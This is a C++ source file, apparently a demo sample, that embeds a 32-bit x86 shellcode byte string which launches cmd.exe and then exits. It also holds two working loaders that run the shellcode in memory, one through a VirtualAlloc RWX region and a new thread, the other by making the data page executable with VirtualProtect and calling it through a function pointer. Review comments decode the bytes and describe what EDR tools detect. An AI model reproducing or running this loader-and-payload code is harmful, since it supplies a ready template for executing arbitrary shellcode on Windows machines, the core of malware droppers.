shellcode_exec.cpp
#include<windows.h>
#include<cstdio>
#include<cstdlib>
#include<iostream>
using namespace std;
//execute shellcode in windows
// Demo payload shared by the two runner functions in this file.
// What the bytes themselves show:
//  - They open with 31 C9 64 A1 30 00 00 00 (xor ecx,ecx / mov eax,fs:[0x30]), i.e. the
//    code reaches the PEB through FS. That is 32-bit x86 only, so the buffer is only
//    meaningful in an x86 build.
//  - The embedded ASCII fragments spell "GetP"/"rocA"/"ddre", "WinExec", "ExitProcess"
//    and "cmd.exe", which matches the author's label below: resolve GetProcAddress,
//    start cmd.exe, then exit the process.
//  - The data contains 0x00 bytes from offset 5 onwards, so strlen() does not measure
//    it; the size of the buffer is sizeof(shellcode) (which also counts the literal's
//    terminating NUL).
// NOTE(review): the trailing FF FF FF FF 00 00 00 groups look like padding left over
// from the generator rather than instructions -- confirm before trimming.
char shellcode[]="\x31\xc9\x64\xa1\x30\x00\x00\x00\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x53\x3c\x01\xda\x8b\x52\x78\x01\xda\x8b\x72\x20\x01\xde\x31\xc9\x41\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x72\x24\x01\xde\x66\x8b\x0c\x4e\x49\x8b\x72\x1c\x01\xde\x8b\x14\x8e\x01\xda\x31\xf6\x52\x5e\x31\xff\x53\x5f\x31\xc9\x51\x68\x78\x65\x63\x00\x68\x57\x69\x6e\x45\x89\xe1\x51\x53\xff\xd2\x31\xc9\x51\x68\x65\x73\x73\x00\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x89\xe1\x51\x57\x31\xff\x89\xc7\xff\xd6\x31\xf6\x50\x5e\x31\xc9\x51\x68\x65\x78\x65\x00\x68\x63\x6d\x64\x2e\x89\xe1\x6a\x00\x51\xff\xd7\x6a\x00\xff\xd6\xff\xff\xff\xff\x00\x00\x00\xff\xff\xff\xff\x00\x00\x00";
//CMD EXE SHELLCODE
// Author's label for the buffer above: a payload that starts cmd.exe.
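// Copies the payload buffer into a freshly allocated region and runs it on a new
// thread, then waits for that thread to finish.
//
// Returns 0 on success, or the GetLastError() code of the API call that failed.
//
// Defender's view: the sequence below (private RWX allocation, copy, thread whose
// start address lies inside that allocation rather than inside a loaded image) is
// the textbook in-process execution pattern that memory scanners and EDR thread-start
// telemetry key on. It is kept as-is because that is what this sample demonstrates.
DWORD WINAPI dynamic_thread(){
    // MEM_COMMIT | MEM_RESERVE is 0x3000 and PAGE_EXECUTE_READWRITE is 0x40: the same
    // values the magic numbers encoded, now spelled by name.
    LPVOID addressPointer = VirtualAlloc(NULL, sizeof(shellcode),
                                         MEM_COMMIT | MEM_RESERVE,
                                         PAGE_EXECUTE_READWRITE);
    if (addressPointer == NULL) {
        // Without this check the copy below would write through a null pointer.
        return GetLastError();
    }

    // sizeof, not strlen: the buffer contains embedded 0x00 bytes.
    RtlMoveMemory(addressPointer, shellcode, sizeof(shellcode));

    HANDLE th = CreateThread(NULL, 0,
                             reinterpret_cast<LPTHREAD_START_ROUTINE>(addressPointer),
                             NULL, 0, NULL);
    if (th == NULL) {
        const DWORD err = GetLastError();
        VirtualFree(addressPointer, 0, MEM_RELEASE);
        return err;
    }

    const DWORD waited = WaitForSingleObject(th, INFINITE);
    CloseHandle(th);

    // Release the region only when the thread is known to have ended; if the wait
    // itself failed the thread may still be executing from it.
    if (waited == WAIT_OBJECT_0) {
        VirtualFree(addressPointer, 0, MEM_RELEASE);
    }
    return 0;
}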
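// Marks the global payload buffer executable in place and calls it through a
// function pointer.
//
// Returns 0 after the call comes back, or 1 when the protection change fails (in
// which case the buffer is never called).
//
// Fixes over the earlier version:
//  - the length passed to VirtualProtect is sizeof(shellcode); strlen() stopped at the
//    first 0x00 byte (offset 5), so the call only covered the whole buffer when it
//    happened to sit inside a single page;
//  - the `if` had no braces, so "Prev was ..." printed an uninitialised value and the
//    jump was taken even when VirtualProtect failed;
//  - DWORD is printed with %lu instead of %d.
//
// Defender's view: VirtualProtect works on whole pages, so this turns every page the
// buffer touches -- including unrelated globals sharing those pages -- into RWX.
// A module data page flipped to PAGE_EXECUTE_READWRITE is a strong detection signal.
DWORD WINAPI func_ptr()
{
    DWORD Prev = 0;
    //enables execution in region where shellcode is stored
    if (!VirtualProtect(shellcode, sizeof(shellcode), PAGE_EXECUTE_READWRITE, &Prev)) {
        fprintf(stderr, "VirtualProtect failed: %lu\n", GetLastError());
        return 1;
    }
    printf("worked");
    //previous page flags read/write/execute
    printf("Prev was %lu", Prev);

    //function pointer part like linux
    int (*func)() = reinterpret_cast<int (*)()>(shellcode);
    func();

    // Put the original protection back so the data page does not stay executable.
    // NOTE(review): the strings embedded in the payload suggest it ends by exiting
    // the process, so this line may never be reached -- confirm.
    DWORD ignored = 0;
    VirtualProtect(shellcode, sizeof(shellcode), Prev, &ignored);
    return 0;
}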
// Program entry point. Runs only the in-place variant (func_ptr); dynamic_thread is
// defined in this file but is not called from here.
int main()
{
    (void)func_ptr();
    return 0;
}